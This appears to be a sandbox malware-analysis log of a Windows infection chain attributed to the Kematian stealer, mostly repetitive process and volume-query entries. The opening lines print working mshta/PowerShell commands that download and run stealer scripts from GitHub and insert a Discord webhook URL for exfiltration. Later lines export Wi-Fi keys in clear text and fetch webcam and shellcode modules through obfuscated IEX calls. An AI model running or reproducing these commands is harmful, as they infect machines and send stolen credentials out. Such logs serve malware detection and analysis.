      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0)) Jump to behavior
      Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 sessionJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iexJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" wlan export profile folder=C:\Users\user~1\AppData\Local\Temp\wifi key=clearJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1')) Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1')) Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.cmdline"
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESA945.tmp" "c:\Users\user\AppData\Local\Temp\bekownh2\CSCE31222C310BD40CB8ED0AE4A3AB63C88.TMP"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta vbscript:close(createobject("wscript.shell").run("powershell $progresspreference = 'silentlycontinue';$t = iwr -uri 'https://raw.githubusercontent.com/childrenofyahweh/kematian-stealer/main/frontend-src/main.ps1' -usebasicparsing; $t -replace 'your_webhook_here', 'https://discord.com/api/webhooks/1245964468803076146/suqk99w99wqnozbfrcw8trsn0tetptud0ynk0n7xwueipnwmv6hdm9vybcjvt-fa2zdw' | iex",0))
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $progresspreference = 'silentlycontinue';$t = iwr -uri 'https://raw.githubusercontent.com/childrenofyahweh/kematian-stealer/main/frontend-src/main.ps1' -usebasicparsing; $t -replace 'your_webhook_here', 'https://discord.com/api/webhooks/1245964468803076146/suqk99w99wqnozbfrcw8trsn0tetptud0ynk0n7xwueipnwmv6hdm9vybcjvt-fa2zdw' | iex
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta vbscript:close(createobject("wscript.shell").run("powershell $progresspreference = 'silentlycontinue';$t = iwr -uri 'https://raw.githubusercontent.com/childrenofyahweh/kematian-stealer/main/frontend-src/main.ps1' -usebasicparsing; $t -replace 'your_webhook_here', 'https://discord.com/api/webhooks/1245964468803076146/suqk99w99wqnozbfrcw8trsn0tetptud0ynk0n7xwueipnwmv6hdm9vybcjvt-fa2zdw' | iex",0)) Jump to behavior
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $progresspreference = 'silentlycontinue';$t = iwr -uri 'https://raw.githubusercontent.com/childrenofyahweh/kematian-stealer/main/frontend-src/main.ps1' -usebasicparsing; $t -replace 'your_webhook_here', 'https://discord.com/api/webhooks/1245964468803076146/suqk99w99wqnozbfrcw8trsn0tetptud0ynk0n7xwueipnwmv6hdm9vybcjvt-fa2zdw' | iexJump to behavior
      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
